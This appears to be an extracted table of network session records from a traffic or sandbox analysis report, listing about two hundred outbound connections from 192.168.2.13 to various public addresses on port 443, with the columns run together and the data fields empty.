                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19626192.168.2.134010850.79.40.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19627192.168.2.134945280.39.193.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19628192.168.2.1337348197.185.43.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19629192.168.2.1339940191.174.166.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19630192.168.2.1359496136.33.253.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19631192.168.2.134989248.109.28.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19632192.168.2.1346334188.28.82.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19633192.168.2.1340124149.184.55.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19634192.168.2.1358632142.84.23.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19635192.168.2.13509082.143.245.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19636192.168.2.135964814.47.69.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19637192.168.2.1333250105.170.133.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19638192.168.2.1348972106.246.129.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19639192.168.2.1344300210.95.131.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19640192.168.2.1356866154.106.89.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19641192.168.2.1340260187.51.18.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19642192.168.2.1346956128.143.176.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19643192.168.2.135289091.182.239.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19644192.168.2.133341631.183.98.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19645192.168.2.1340482179.108.176.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19646192.168.2.1358388200.17.134.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19647192.168.2.1339992122.48.136.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19648192.168.2.1344198176.110.238.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19649192.168.2.1338434204.187.107.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19650192.168.2.1345368192.69.166.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19651192.168.2.134455275.103.48.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19652192.168.2.133492494.86.179.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19653192.168.2.133846841.60.150.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19654192.168.2.134829039.56.80.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19655192.168.2.1351624157.185.33.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19656192.168.2.1336158207.190.235.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19657192.168.2.134691890.76.162.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19658192.168.2.135433862.63.44.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19659192.168.2.134300823.109.180.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19660192.168.2.134273820.70.130.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19661192.168.2.134050889.122.49.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19662192.168.2.1359610119.153.81.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19663192.168.2.1358234128.192.251.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19664192.168.2.1351102105.194.62.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19665192.168.2.135721484.215.12.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19666192.168.2.135043042.56.30.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19667192.168.2.1349298183.26.105.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19668192.168.2.1336858163.56.52.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19669192.168.2.1349948130.11.195.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19670192.168.2.133316645.124.220.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19671192.168.2.134951890.133.214.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19672192.168.2.1343160183.199.240.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19673192.168.2.1352794189.49.127.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19674192.168.2.1352352223.66.57.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19675192.168.2.135495472.205.190.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19676192.168.2.1344342211.184.153.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19677192.168.2.1350070147.27.105.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19678192.168.2.133696442.85.202.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19679192.168.2.1354910184.189.135.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19680192.168.2.1353968152.212.150.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19681192.168.2.135400051.242.185.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19682192.168.2.1333086111.182.159.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19683192.168.2.1356976163.155.66.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19684192.168.2.1357520134.203.236.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19685192.168.2.1333654158.186.140.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19686192.168.2.1332942208.201.250.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19687192.168.2.1339954222.243.16.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19688192.168.2.1335070100.146.107.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19689192.168.2.1351988195.51.165.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19690192.168.2.135130045.167.17.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19691192.168.2.136047614.45.62.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19692192.168.2.1355306209.221.228.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19693192.168.2.134122035.132.157.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19694192.168.2.1333610118.165.70.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19695192.168.2.1340650178.147.49.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19696192.168.2.1337948192.178.140.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19697192.168.2.135656850.119.55.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19698192.168.2.1354528203.214.0.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19699192.168.2.1359010183.30.62.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19700192.168.2.1343396220.170.76.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19701192.168.2.1351878179.51.44.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19702192.168.2.1339266220.197.91.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19703192.168.2.133710269.122.225.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19704192.168.2.1353358221.135.59.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19705192.168.2.134343270.158.244.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19706192.168.2.1334562121.183.32.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19707192.168.2.134265094.7.187.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19708192.168.2.1346204105.243.74.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19709192.168.2.133478437.74.27.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19710192.168.2.1338306144.206.101.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19711192.168.2.134225850.245.206.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19712192.168.2.135440861.230.123.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19713192.168.2.133759895.170.41.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19714192.168.2.1336898186.40.114.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19715192.168.2.1354086129.52.26.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19716192.168.2.135211220.19.141.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19717192.168.2.1347792160.121.230.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19718192.168.2.1359084140.201.191.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19719192.168.2.1360456158.186.186.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19720192.168.2.135801896.215.233.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19721192.168.2.134331089.184.167.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19722192.168.2.1347414175.72.34.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19723192.168.2.1359580159.113.67.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19724192.168.2.1353182136.170.244.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19725192.168.2.1353286213.216.239.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19726192.168.2.134058093.192.208.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19727192.168.2.134346868.167.234.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19728192.168.2.1355000110.39.115.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19729192.168.2.1353204156.219.7.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19730192.168.2.133375417.173.72.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19731192.168.2.1353410192.73.102.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19732192.168.2.135346289.226.193.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19733192.168.2.135975847.124.251.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19734192.168.2.1360534206.7.28.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19735192.168.2.135668827.203.137.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19736192.168.2.1339956186.150.73.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19737192.168.2.1342238177.6.86.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19738192.168.2.134750697.32.116.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19739192.168.2.1349418135.126.136.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19740192.168.2.1351290177.73.134.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19741192.168.2.1349996176.88.38.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19742192.168.2.134196476.238.217.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19743192.168.2.134809841.229.16.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19744192.168.2.1343116198.147.186.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19745192.168.2.1352318183.187.219.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19746192.168.2.134905651.90.77.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19747192.168.2.1355728182.193.64.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19748192.168.2.1344924173.226.215.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19749192.168.2.1345352155.227.80.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19750192.168.2.1336424192.118.202.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19751192.168.2.135190225.24.124.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19752192.168.2.135444818.129.129.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19753192.168.2.135578884.15.37.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19754192.168.2.133722465.119.159.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19755192.168.2.1336080217.60.23.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19756192.168.2.134734454.206.127.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19757192.168.2.133677014.89.231.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19758192.168.2.134741643.143.206.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19759192.168.2.1347662157.74.207.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19760192.168.2.1335004209.228.110.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19761192.168.2.135557849.91.143.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19762192.168.2.1352710120.94.63.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19763192.168.2.1350302199.52.70.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19764192.168.2.13501929.212.21.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19765192.168.2.134696672.112.184.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19766192.168.2.134109876.188.140.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19767192.168.2.1334030183.80.111.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19768192.168.2.13403709.250.131.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19769192.168.2.1346552177.228.83.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19770192.168.2.1348848177.68.30.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19771192.168.2.1340254104.169.236.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19772192.168.2.1350546104.174.156.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19773192.168.2.133891051.34.235.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19774192.168.2.135077268.108.24.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19775192.168.2.1344018200.79.134.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19776192.168.2.133520017.190.73.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19777192.168.2.135948860.90.2.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19778192.168.2.133281836.0.34.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19779192.168.2.1340212109.126.24.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19780192.168.2.1359344208.21.8.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19781192.168.2.134549274.83.52.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19782192.168.2.135843454.43.152.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19783192.168.2.134802035.97.85.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19784192.168.2.13362748.238.53.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19785192.168.2.1344184131.188.216.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19786192.168.2.135336882.30.226.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19787192.168.2.1360508223.14.188.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19788192.168.2.134767288.111.239.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19789192.168.2.133489860.102.194.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19790192.168.2.1341852105.142.110.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19791192.168.2.133811080.0.226.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19792192.168.2.133347837.122.203.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19793192.168.2.135465213.2.103.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19794192.168.2.1355300178.191.220.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19795192.168.2.134997478.245.169.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19796192.168.2.134547672.53.101.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19797192.168.2.134233495.75.122.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19798192.168.2.1338538161.3.192.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19799192.168.2.1337060152.60.93.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19800192.168.2.1355150219.16.32.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19801192.168.2.1352768130.20.197.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19802192.168.2.134542819.187.185.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19803192.168.2.1332938130.18.140.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19804192.168.2.1352390153.192.249.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19805192.168.2.1348116198.48.15.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19806192.168.2.1344484179.164.88.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19807192.168.2.136010467.135.165.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19808192.168.2.13520465.112.239.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19809192.168.2.1350014194.84.173.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19810192.168.2.1360620190.253.74.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19811192.168.2.1338270198.117.61.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19812192.168.2.135171870.75.64.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19813192.168.2.1343290181.132.197.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19814192.168.2.135398832.51.101.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19815192.168.2.1358338174.224.13.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19816192.168.2.133730869.209.37.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19817192.168.2.134194292.42.167.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19818192.168.2.1349238167.127.206.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19819192.168.2.1357486139.201.23.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19820192.168.2.1351358138.49.20.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19821192.168.2.1340662106.14.66.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19822192.168.2.1360796152.220.210.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19823192.168.2.1346720135.176.98.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19824192.168.2.13562848.146.226.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19825192.168.2.134527478.158.163.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19826192.168.2.135979023.64.222.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19827192.168.2.135103451.33.194.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19828192.168.2.1356006169.195.160.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19829192.168.2.1353404126.227.169.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19830192.168.2.1359192146.142.103.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19831192.168.2.1348700152.157.34.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19832192.168.2.13565265.119.145.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19833192.168.2.1350112182.165.217.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19834192.168.2.133488684.108.235.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19835192.168.2.134441482.204.174.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19836192.168.2.1354484153.49.183.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19837192.168.2.135900040.88.57.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
